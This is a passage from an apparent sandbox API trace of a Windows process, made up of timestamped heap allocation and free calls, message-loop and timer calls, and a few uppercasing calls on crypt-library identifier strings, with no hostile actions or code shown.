(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0255.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0255.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0255.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0255.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0255.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0255.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0255.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0255.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0255.252] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0255.252] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0255.252] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0255.252] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0255.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0255.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0255.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0255.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0255.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0255.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0255.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f1b5d0 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f1f0b0 [0255.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1b5d0 | out: hHeap=0x970000) returned 1 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0255.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0255.255] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0255.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0255.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0255.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.256] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0255.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0255.257] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.257] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0255.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0255.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.258] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0255.258] 